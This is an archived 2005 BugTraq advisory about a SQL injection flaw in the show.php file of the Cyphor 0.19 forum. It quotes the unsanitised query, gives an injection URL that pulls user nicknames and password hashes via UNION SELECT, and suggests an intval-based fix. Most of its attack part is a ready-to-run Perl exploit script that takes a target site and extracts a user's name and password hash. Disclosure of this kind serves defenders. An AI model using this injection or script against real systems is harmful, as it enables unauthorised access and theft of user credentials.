BugTraq
Cyphor (Release: 0.19) Sql injection Nov 13 2005 07:21PM
s2b hotmail com
Hello

This is sql injection in cyphor

Discovered by : HACKERS PAL

Greets For Devil-00 - Abducter - Almaster
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected vresions :-
Cyphor (Release: 0.19) and all Versions Up To now
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected File
show.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injection code :-
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,pas
sword,null,null,null%20from%20users%20where%20id=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Discovering the vul :-
searching in show.php file in line 59 to 62 as below

[/code]
if ($id) {
// a message with id=$id will be displayed
$message_mode = 1;
$query = "SELECT * FROM $db_table_name WHERE id=$id";
[/code]

The Programmed Didont Check The $id Variable .. if it was integer
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
How to protect :-

after
$message_mode = 1;

add
// Script Protection By : HACKERS PAL
$id=intval($id);
if(!$id)
{
die("<br>We Dont allow Skript Kidz .. <br> By <a hre='Http://www.sqor.net'>HACKERS PAL</a>");
}
// !/script Porotection By : HACKERS PAL fINISHED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
exploit :-

#!/bin/env perl

#//-----------------------------------------------------------#

#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL

#// Greets For Devil-00 - Abducter - Almaster

#// http://WwW.SoQoR.NeT

#//-----------------------------------------------------------#

use LWP::Simple;

print "\n#####################################################";

print "\n# Cyphor Forum Exploit By : HACKERS PAL #";

print "\n# Http://WwW.SoQoR.NeT #";

if(!$ARGV[0]||!$ARGV[1]) {

print "\n# -- Usage: #";

print "\n# -- perl $0 [Full-Path] 1 #";

print "\n# -- Example: #";

print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";

print "\n# Greets To Devil-00 - Abducter - almastar #";

print "\n#####################################################\n";

exit(0);

}

else

{

print "\n# Greets To Devil-00 - Abducter - almastar #";

print "\n#####################################################\n";

$web=$ARGV[0];
$id=$ARGV[1];

$url = "show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,
10%20from%20users%20where%20id=$id";

$site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

print "\n[+] Connected to: $ARGV[0]\n";

print "[+] User ID is : $id ";

$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";

print "\n[-] Unable to retrieve User Name\n" if(!$1);

$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";

print "[-] Unable to retrieve hash of password\n" if(!$1);

}

print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";

#finished

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus